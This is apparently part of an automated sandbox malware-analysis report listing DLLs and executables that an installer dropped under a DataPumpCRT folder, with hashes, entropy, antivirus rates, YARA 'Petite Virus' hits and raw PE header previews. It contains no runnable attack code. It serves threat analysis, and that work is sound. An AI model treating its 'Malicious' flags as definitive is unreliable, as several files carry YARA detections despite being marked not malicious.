SHA-512:	50D455C16076C0738FB1FECAE7705E2C9757DF5961D74B7155D7DFB3FAB671F964C73F919CC749D100F6A90A3454BFF0D15ED245A7D26ABCAA5E0FDE3DC958FD
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...............................k.........................`................ .........................r.......D............................P..\|.......................................................\............................text...............................`.P`.data...0...........................@.0..rdata..8...........................@.`@/4......L...........................@.0@.bss..................................`..edata..r...........................@.0@.idata..D...........................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc..\|....P......................@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\gain_analysis.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	26126
Entropy (8bit):	6.048294343792499
Encrypted:	false
SSDEEP:	384:hhkxE9v7/GRm4v5OxlBWaEybb9p7aCyS/hU7CateHcUwSCnq6D:Yx6jGXvc5WaBb99yS/hQh
MD5:	D1223F86EDF0D5A2D32F1E2AAAF8AE3F
SHA1:	C286CA29826A138F3E01A3D654B2F15E21DBE445
SHA-256:	E0E11A058C4B0ADD3892E0BEA204F6F60A47AFC86A21076036393607235B469C
SHA-512:	7EA1FFB23F8A850F5D3893C6BB66BF95FAB2F10F236A781620E9DC6026F175AAE824FD0E03082F0CF13D05D13A8EEDE4F5067491945FCA82BBCDCF68A0109CFF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........f.........#.....6...b...............P.....h................................8-........ .........................i...................................................................Lk......................................................text....4.......6..................`.P`.data...,....P.......:..............@.0..rdata.......`.......<..............@.`@/4......T....p.......J..............@.0@.bss..................................`..edata..i............V..............@.0@.idata...............X..............@.0..CRT....,............^..............@.0..tls.................`..............@.0..reloc...............b..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\is-01JPP.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	22542
Entropy (8bit):	5.5875455203930615
Encrypted:	false
SSDEEP:	384:RKAPwPQJgZd3rw0bGMtyz1fiaqmjj1nFY4j70UotV9mRyK:YPQJgZZwUGH1fJljj1+D18
MD5:	E1C0147422B8C4DB4FC4C1AD6DD1B6EE
SHA1:	4D10C5AD96756CBC530F3C35ADCD9E4B3F467CFA
SHA-256:	124F210C04C12D8C6E4224E257D934838567D587E5ABAEA967CBD5F088677049
SHA-512:	A163122DFFE729E6F1CA6EB756A776F6F01A784A488E2ACCE63AEAFA14668E8B1148BE948EB4AF4CA8C5980E85E681960B8A43C94B95DFFC72FCCEE1E170BD9A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........X...............,...T...............@....@.......................................... .................................@...........................................................PU..........................P............................text....+.......,..................`.P`.data........@.......0..............@.`..rdata..0....P.......2..............@.0@/4...........`.......<..............@.0@.bss.........p........................`..idata..@............J..............@.0..CRT....4............T..............@.0..tls.................V..............@.0.................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\is-0MOHV.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	394752
Entropy (8bit):	6.662070316214798
Encrypted:	false
SSDEEP:	6144:uAlmRfeS+mOxv8bgDTuXU54l8WybBE36IpuIT9nxQPQnhH/a0CRdWqWJwGKp:zlm0S+SEuXU54NylJIJ9KPQnhilRsVJ
MD5:	A4123DE65270C91849FFEB8515A864C4
SHA1:	93971C6BB25F3F4D54D4DF6C0C002199A2F84525
SHA-256:	43A9928D6604BF604E43C2E1BAB30AE1654B3C26E66475F9488A95D89A4E6113
SHA-512:	D0834F7DB31ABA8AA9D97479938DA2D4CD945F76DC2203D60D24C75D29D36E635C2B0D97425027C4DEBA558B8A41A77E288F73263FA9ABC12C54E93510E3D384
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......KL...-d..-d..-d..U...-d..Be..-d.TEe..-d..-e.:-d..Ba..-d..B`..-d..Bg..-d..B`.c-d..Bd..-d..B...-d..Bf..-d.Rich.-d.........................PE..L.....b`...........!.....L..........+S.......`...............................P............@.................................L........... .................... ..\ ..$...............................@...@............`...............................text...NK.......L.................. ..`.rdata......`.......P..............@..@.data...............................@....rsrc... ...........................@..@.reloc..\ ... ..."..................@..B................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\is-28DPF.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	26126
Entropy (8bit):	6.048294343792499
Encrypted:	false
SSDEEP:	384:hhkxE9v7/GRm4v5OxlBWaEybb9p7aCyS/hU7CateHcUwSCnq6D:Yx6jGXvc5WaBb99yS/hQh
MD5:	D1223F86EDF0D5A2D32F1E2AAAF8AE3F
SHA1:	C286CA29826A138F3E01A3D654B2F15E21DBE445
SHA-256:	E0E11A058C4B0ADD3892E0BEA204F6F60A47AFC86A21076036393607235B469C
SHA-512:	7EA1FFB23F8A850F5D3893C6BB66BF95FAB2F10F236A781620E9DC6026F175AAE824FD0E03082F0CF13D05D13A8EEDE4F5067491945FCA82BBCDCF68A0109CFF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........f.........#.....6...b...............P.....h................................8-........ .........................i...................................................................Lk......................................................text....4.......6..................`.P`.data...,....P.......:..............@.0..rdata.......`.......<..............@.`@/4......T....p.......J..............@.0@.bss..................................`..edata..i............V..............@.0@.idata...............X..............@.0..CRT....,............^..............@.0..tls.................`..............@.0..reloc...............b..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\is-338K7.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	112640
Entropy (8bit):	6.540227486061059
Encrypted:	false
SSDEEP:	1536:45vq1zsdXYjZmGz9anu3MwjLA/eeiUKJP3Djl23HTKJ7WMU3lPyK+ZSrKxV/UJ9G:vzMMg/gMKeGsMIl6K+Zvry5zNY
MD5:	BDB65DCE335AC29ECCBC2CA7A7AD36B7
SHA1:	CE7678DCF7AF0DBF9649B660DB63DB87325E6F69
SHA-256:	7EC9EE07BFD67150D1BC26158000436B63CA8DBB2623095C049E06091FA374C3
SHA-512:	8AABCA6BE47A365ACD28DF8224F9B9B5E1654F67E825719286697FB9E1B75478DDDF31671E3921F06632EED5BB3DDA91D81E48D4550C2DCD8E2404D566F1BC29
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................f...N......0u............@.....................................................................2.......v...............................h...................................................................................CODE....Pe.......f.................. ..`DATA....D............j..............@...BSS......................................idata..v...........................@....edata..2...........................@..P.reloc..h...........................@..P.rsrc...............................@..P....................................@..P................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\is-57NTO.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	16910
Entropy (8bit):	5.289608933932413
Encrypted:	false
SSDEEP:	384:ohtyjknGC7hipL+9mLYFOozxkdlDNUwS5Qq:UGknGC74l+MUFI7C
MD5:	2F040608E68E679DD42B7D8D3FCA563E
SHA1:	4B2C3A6B8902E32CDA33A241B24A79BE380C55FC
SHA-256:	6B980CADC3E7047CC51AD1234CB7E76FF520149A746CB64E5631AF1EA1939962
SHA-512:	718AF5BE259973732179ABA45B672637FCA21AE575B4115A62139A751C04F267F355B8F7F7432B56719D91390DABA774B39283CBCFE18F09CA033389FB31A4FC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........B.........#.........>...f...........0.....h......................... ................ .........................{.......\|...............................$...........................pA.......................................................text...4...........................`.P`.data...<....0......."..............@.0..rdata.......@.......$..............@.`@/4...........P.......(..............@.0@.bss.....d...`........................`..edata..{............2..............@.0@.idata..\|............4..............@.0..CRT....,............:..............@.0..tls.................<..............@.0..reloc..$............>..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\is-62HR3.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	35588
Entropy (8bit):	7.817557274117395
Encrypted:	false
SSDEEP:	768:dCrMZHv56WRldhmLjQDrbfc8cznHvc6modHQ:sAR0LzHvc6m2HQ
MD5:	58521D1AC2C588B85642354F6C0C7812
SHA1:	5912D2507F78C18D5DC567B2FA8D5AE305345972
SHA-256:	452EEE1E4EF2FE2E00060113CCE206E90986E2807BB966019AC4E9DEB303A9BD
SHA-512:	3988B61F6B633718DE36C0669101E438E70A17E3962A5C3A519BDECC3942201BA9C3B3F94515898BB2F8354338BA202A801B22129FC6D56598103B13364748C1
Malicious:	false
Yara Hits:	Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-62HR3.tmp, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Reputation:	unknown
Preview:	MZ......................@...................................D.... ..PE..L.....yX...........!.................@.......................................P............@.........................PB.......A..d.... ..@...................P........................................................A..8...............................................................@..@.rsrc........ ......................@..@.............0.........................@petite.......@......................`..`...................................._3.....g.ge..7t...R-_.R.@c.S.\..J?L.EZ.,....=H8..;.QJ.....P-)eFs93:.^...f......}..?...e...SD.......-.u.......q2...P...6..z5.T.S..P..Q....@..Mq.>....8" F...,..FE...S.[U..c......jr....b...-%...`......w..+W.C......]..#......LS....W.Y....o.8...i.[)..%(.2.t...YY .bL.....b.@&J,?l.........$..F..&...a#.\[".^...&]co....K.>...xQzw..XW.uT..+dm.o.b...@c....3..r....@]...P........{C/.....A!.&..........'....._..."S..&..F.......:.dxtK.6...7.I...Q..Nm2.....NX..fG..L..7.?..".(

C:\Program Files (x86)\DataPumpCRT\bin\x86\is-6USPQ.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	772608
Entropy (8bit):	6.546391052615969
Encrypted:	false
SSDEEP:	6144:Q75mFL0MNnM/SQdtij4UujFhGiNV1SckT3wio2L2jV6EfnQ29mwF3s4iGtInw1m8:AwN0e0lN1fnQUFccGns9ukS6
MD5:	B3B487FC3832B607A853211E8AC42CAD
SHA1:	06E32C28103D33DAD53BE06C894203F8808D38C1
SHA-256:	30BC10BD6E5B2DB1ACE93C2004E24C128D20C242063D4F0889FD3FB3E284A9E4
SHA-512:	FA6BDBA4F2A0CF4CCA40A333B69FD041D9EDC0736EDA206F17F10AF5505CC4688B0401A3CAD2D2F69392E752B8877DB593C7872BCDB133DC785A200FF38598BB
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....1.d.................D..........$].......`....@.......................................@......@...................0..o............p...(...................`...............................P......................X........ .......................text...h4.......6.................. ..`.itext.......P.......:.............. ..`.data....7...`...8...H..............@....bss....0i...............................idata..............................@....didata...... ......................@....edata..o....0......................@..@.tls.........@...........................rdata..]....P......................@..@.reloc.......`......................@..B.rsrc....(...p...(..................@..@....................................@..@................

C:\Program Files (x86)\DataPumpCRT\bin\x86\is-7DFBO.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	15374
Entropy (8bit):	5.192037544202194
Encrypted:	false
SSDEEP:	384:lhgkOI7BGi9gKV6uq+u6JewsNhNXUwSCgQ:DT7BGVKPKbXF
MD5:	BEFD36FE8383549246E1FD49DB270C07
SHA1:	1EF12B568599F31292879A8581F6CD0279F3E92A
SHA-256:	B5942E8096C95118C425B30CEC8838904897CDEF78297C7BBB96D7E2D45EE288
SHA-512:	FD9AA6A4134858A715BE846841827196382D0D86F2B1AA5C7A249B770408815B0FE30C4D1E634E8D6D3C8FEDBCE4654CD5DC240F91D54FC8A7EFE7CAE2E569F4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........<.........#.........8...............0.....f................................b......... ......................p..E.......h...........................................................P@......................................................text...............................`.P`.data...,....0....... ..............@.0..rdata.......@......."..............@.0@/4...........P.......$..............@.0@.bss.........`........................`..edata..E....p......................@.0@.idata..h............0..............@.0..CRT....,............6..............@.0..tls.................8..............@.0..reloc...............:..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\is-7DQAC.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18966
Entropy (8bit):	7.620111275837424
Encrypted:	false
SSDEEP:	384:gOKwxnw6OVDU839fgRgFMkucNauTT80CyTIz2bGjqXOK0Jo:gOHwBDUOe2McQkI0Cyo2Q/o
MD5:	F0F973781B6A66ADF354B04A36C5E944
SHA1:	8E8EE3A18D4CEC163AF8756E1644DF41C747EDC7
SHA-256:	04AB613C895B35044AF8A9A98A372A5769C80245CC9D6BF710A94C5BC42FA1B3
SHA-512:	118D5DACC2379913B725BD338F8445016F5A0D1987283B082D37C1D1C76200240E8C79660E980F05E13E4EB79BDA02256EAC52385DAA557C6E0C5D326D43A835
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-7DQAC.tmp, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Reputation:	unknown
Preview:	MZ......................@...................................D.... ..PE..L...9#.]...........!.........B...............p............................................@.....................................x.......@....................M..........................................................@............................................>..................@..@.rsrc................@..............@..@.......................................@petite...............D..............`..`....................................g5 ....S%,_ .]/.0$R.yB..."@...N.AGG.^.?...1.........&?....v....6.0.. ME..(..gh\jv#.l..#$.Z&...._\`.@.......D.;.C~..m}3..\>.h..@.;.f Tho...(xVs..m.c..F..SS.C...z[....z...... .X.&....HY,...o.d..jP.nr..@.)..W.1#...b..Q.*E8.B..N5.....].........7..A..2c.M.q.O0(.Gi..B.....CT.(..+....>@T j.#!..."..P.u.3..5.Q0K..p....ERvG..._'...ir%m...NT.v:.....g.....8.+....m....8..Z.=.B.......D_..ln...C.......p8...e."...U...+.f..E.=X.j.DeD.X_.Y..n.r.!xWu..\.VB.......`.F.A....dx...

C:\Program Files (x86)\DataPumpCRT\bin\x86\is-8S45S.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	214016
Entropy (8bit):	6.676457645865373
Encrypted:	false
SSDEEP:	3072:v3UEEkp2yVTcc295GSSazZq0/OlxAOxN5jZ2Ti30ezAg0Fu9RBhk1Xion:cEEpYcc2G/adqLtxLZ2+vAO9Hhkzn
MD5:	2C747F19BF1295EBBDAB9FB14BB19EE2
SHA1:	6F3B71826C51C739D6BB75085E634B2B2EF538BC
SHA-256:	D2074B91A63219CFD3313C850B2833CD579CC869EF751B1F5AD7EDFB77BD1EDD
SHA-512:	C100C0A5AF52D951F3905884E9B9D0EC1A0D0AEBE70550A646BA6E5D33583247F67CA19E1D045170A286D92EE84E1676A6C1B0527E017A35B6242DD9DEE05AF4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}6,.9WB.9WB.9WB...9.:WB.9WC.hWB....;WB."..&WB."..WB."...WB.9WB.?WB."..8WB."..8WB."..8WB.Rich9WB.........PE..L......W...........!.....N...........n.......`............................................@.........................`...h.......(....`..X....................p.......................................................`...............................text...?L.......N.................. ..`.rdata......`.......R..............@..@.data....W.......2..................@....rsrc...X....`......................@..@.reloc..f&...p...(..................@..B........................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\is-9EPE2.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	648384
Entropy (8bit):	6.666474522542094
Encrypted:	false
SSDEEP:	12288:gAQxmcOwzIYhoz/eZz4gOIwEODAAwnq6Nql1:gvmfAI6oz/uOIyDAAwDNql1
MD5:	CE7DE939D74321A7D0E9BDF534B89AB9
SHA1:	56082B4E09A543562297E098A36AADC3338DEEC5
SHA-256:	A9DC70ABB4B59989C63B91755BA6177C491F6B4FE8D0BFBDF21A4CCF431BC939
SHA-512:	03C366506481B70E8BF6554727956E0340D27CB2853609D6210472AEDF4B3180C52AAD9152BC2CCCBA005723F5B2E3B5A19D0DCE8B8D1E0897F894A4BFEEFE55
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...".t.........................g.........................0................ ..........................................................,.......=..........................,=.......................................................text....r.......t..................`.P`.data............ ...x..............@.`..rdata..L...........................@.`@/4...................\..............@.0@.bss..................................`..edata...............`..............@.0@.idata...............j..............@.0..CRT....,............v..............@.0..tls.................x..............@.0..reloc...=.......>...z..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\is-9PQ68.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	967168
Entropy (8bit):	6.500850562754145
Encrypted:	false
SSDEEP:	12288:j2ezAN6FpYQSzclODziLQEkkDHFb1aWGssVvVmPUwV+SiRm7rhj:jhAgFptPlqmPDHJ1apVdYUy+jRmX
MD5:	C06D6F4DABD9E8BBDECFC5D61B43A8A9
SHA1:	16D9F4F035835AFE8F694AE5529F95E4C3C78526
SHA-256:	665D47597146DDAAA44B771787B750D3CD82C5B5C0B33CA38F093F298326C9BB
SHA-512:	B0EBE9E2682A603C34F2B884121FA5D2D87ED3891990CCD91CD14005B28FE208A3B86FA20E182F9E7FC5142A267C8225AEFDCB23CF5B7556D2CF8F9E3BDE62D4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V.~..m...m...m......m.....m......m.......m..)3...m..)3...m..)3...m.......m...m..rm...m..m..3...m..3...m..3...m..Rich.m..........................PE..L...8..^...........!.........&.......`....................................................@..........................4.......G..<...............................HR..P+..T............................+..@...............D............................text............................... ..`.rdata..............................@..@.data........P...$...D..............@....trace.......`.......h..............@..@.gfids...............~..............@..@_RDATA..@...........................@..@.debug_o............................@..B.rsrc................l..............@..@.reloc..HR.......T...n..............@..B................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\is-AKKJ0.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	852754
Entropy (8bit):	6.503318968423685
Encrypted:	false
SSDEEP:	12288:fpFFQV+FKJ37Dm+yY4pBkPr2v2meLaoHN/oBrZ3ixdnGVzpJXm/iN:fpnzFw37iDYIBkzuPcHNgrZ3uGVzm/iN
MD5:	07FB6D31F37FB1B4164BEF301306C288
SHA1:	4CB41AF6D63A07324EF6B18B1A1F43CE94E25626
SHA-256:	06DDF0A370AF00D994824605A8E1307BA138F89B2D864539F0D19E8804EDAC02
SHA-512:	CAB4A7C5805B80851ABA5F2C9B001FABC1416F6648D891F49EACC81FE79287C5BAA01306A42298DA722750B812A4EA85388FFAE9200DCF656DD1D5B5B9323353
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L..Y.,..v......!......... .....................a................................O}........ ......................................@.......................P..X0...........................0.......................................................text...............................`.P`.data...............................@.`..rdata..............................@.`@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,.... ......................@.0..tls.... ....0......................@.0..rsrc........@......................@.0..reloc..X0...P...2..................@.0B/4...................&..............@.@B/19.................*..............@..B/31..........@......................@..B/45..........`......................@..B/57.................................@.0B/70.....i...............

C:\Program Files (x86)\DataPumpCRT\bin\x86\is-AR2HV.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	240654
Entropy (8bit):	6.518503846592995
Encrypted:	false
SSDEEP:	6144:yZDfF4DjzIHBV+bUeenu+t+oSTdjpNZ7utS81qpHW4paP2L:ekjzMBVKXeuq+oSTdjpr7N8f+L
MD5:	4F0C85351AEC4B00300451424DB4B5A4
SHA1:	BB66D807EDE0D7D86438207EB850F50126924C9D
SHA-256:	CC0B53969670C7275A855557EA16182C932160BC0F8543EFFC570F760AE2185E
SHA-512:	80C84403ED47380FF75EBA50A23E565F7E5C68C7BE8C208A5A48B7FB0798FF51F3D33780C902A6F8AB0E6DB328860C071C77B93AC88CADF84FEF7DF34DE3E2DA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....H...................`.....g.................................\........ .........................o.......\...............................t............................S.......................................................text...dF.......H..................`.P`.data...X....`.......L..............@.P..rdata.......p.......N..............@.`@/4.......<.......>...T..............@.0@.bss..................................`..edata..o...........................@.0@.idata..\...........................@.0..CRT....,...........................@.0..tls................................@.0..reloc..t...........................@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\is-DEI4I.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	562190
Entropy (8bit):	6.388293171196564
Encrypted:	false
SSDEEP:	12288:uCtwsqIfrUmUBrusLdVAjA1ATAtuQ8T2Q8TOksqHOuCHWoEuEc4XEmEVEEAcIHAj:uqiIoYmOuNNQ1zU/xGl
MD5:	713D04E7396D3A4EFF6BF8BA8B9CB2CD
SHA1:	D824F373C219B33988CFA3D4A53E7C2BFA096870
SHA-256:	00FB8E819FFDD2C246F0E6C8C3767A08E704812C6443C8D657DFB388AEB27CF9
SHA-512:	30311238EF1EE3B97DF92084323A54764D79DED62BFEB12757F4C14F709EB2DBDF6625C260FB47DA2D600E015750394AA914FC0CC40978BA494D860710F9DC40
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Rd...............(..........................@.......................................@... .................................H...........................................................D...........................l............................text...T...........................`..`.data...X...........................@....rdata..H...........................@..@/4......P...........................@..@.bss....t................................idata..H............d..............@....CRT....0............n..............@....tls.................p..............@....rsrc................r..............@....reloc...............x..............@..B................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\is-ER2T6.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	127669
Entropy (8bit):	7.952352167575405
Encrypted:	false
SSDEEP:	3072:kdGUCKL7Wn/OzU2ThapTv773+HMnBasgGlBM:dn/mU8K/3EgNgoM
MD5:	75C1D7A3BDF1A309C540B998901A35A7
SHA1:	B06FEEAC73D496C435C66B9B7FF7514CBE768D84
SHA-256:	6303F205127C3B16D9CF1BDF4617C96109A03C5F2669341FBC0E1D37CD776B29
SHA-512:	8D2BBB7A7AD34529117C8D5A122F4DAF38EA684AACD09D5AD0051FA41264F91FD5D86679A57913E5ADA917F94A5EF693C39EBD8B465D7E69EF5D53EF941AD2EE
Malicious:	false
Yara Hits:	Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-ER2T6.tmp, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Reputation:	unknown
Preview:	MZ......................@...................................D.... ..PE..L....O?\...........!.................`.......................................p............@..........................b.......a.......0..@...........................................................................<b..H.................................... ..........................@..@.rsrc........0......................@..@......... ...@.........................@petite.......`......................`..`..........................................fE...nj.:<...n...1..}..r..". .S(...#!............7..5.Q..0..}.. .....^y...U...@..3.........&.lp(.pt.a......!..`@C.O3G7..."\..w.1u.$4..1h...M...K6.L...L..~.w...b2x-.......9k".....".V\............o..................qO&.......4(."0.Zy....2..Y..Z..:2.XM..D....a&..&.L,......./+......c<...^.2.x0..H.618....Q.Q.5.%...Z1.I.......a...q-}.0..D....o.!.....O.......B....# O.!....cY5.#...n.`..1...r!.)].:...m.f.....x....N"t.j..l.....:/...,.v........8F.N...X..j.R......"...&...

C:\Program Files (x86)\DataPumpCRT\bin\x86\is-FP4S7.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	34392
Entropy (8bit):	7.81689943223162
Encrypted:	false
SSDEEP:	768:mYBs3O9YL558R6R8P8W2rjQZQtfTIxRYsetoPNvPWIl+syr:vsUY15mqzW2u8rIxisFcJr
MD5:	EA245B00B9D27EF2BD96548A50A9CC2C
SHA1:	8463FDCDD5CED10C519EE0B406408AE55368E094
SHA-256:	4824A06B819CBE49C485D68A9802D9DAE3E3C54D4C2D8B706C8A87B56CEEFBF3
SHA-512:	EF1E107571402925AB5B1D9B096D7CEFF39C1245A23692A3976164D0DE0314F726CCA0CB10246FE58A13618FD5629A92025628373B3264153FC1D79B0415D9A7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ph..4...4...4.......0...[...0...[...6...4.......V...0...`*..........5....)......Rich4...........................PE..L.....T...........!................6 .......................................0......................................D#..y....!..d.......X............................................................................................................................z..................`....rsrc...........X...................@..@....................................`...petite....... ......................`...................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\is-HPIH3.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	115712
Entropy (8bit):	6.401537154757194
Encrypted:	false
SSDEEP:	3072:rY4gILp0Vt7BMkvfHutO+eP0ZjflQf5xqkYXeo21sb2rqG70:rY4gILp0Vt77nLBCtQfjqv8qG70
MD5:	840D631DA54C308B23590AD6366EBA77
SHA1:	5ED0928667451239E62E6A0A744DA47C74E1CF89
SHA-256:	6BAD60DF9A560FB7D6F8647B75C367FDA232BDFCA2291273A21179495DAC3DB9
SHA-512:	1394A48240BA4EF386215942465BDE418C5C6ED73FC935FE7D207D2A1370155C94CDC15431985ED4E656CA6B777BA79FFC88E78FA3D99DB7E0E6EAC7D1663594
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?..R{...{...{...o...q...o.......o...i...)...W...)...t...)...j...o...x...{.......-...s...-...z...-.4.z...-...z...Rich{...........PE..L....H.a...........!.....$...........h.......@............................... ............@.............................x.......(.......................................8..............................@............@..D............................text....#.......$.................. ..`.rdata...x...@...z...(..............@..@.data.... ..........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

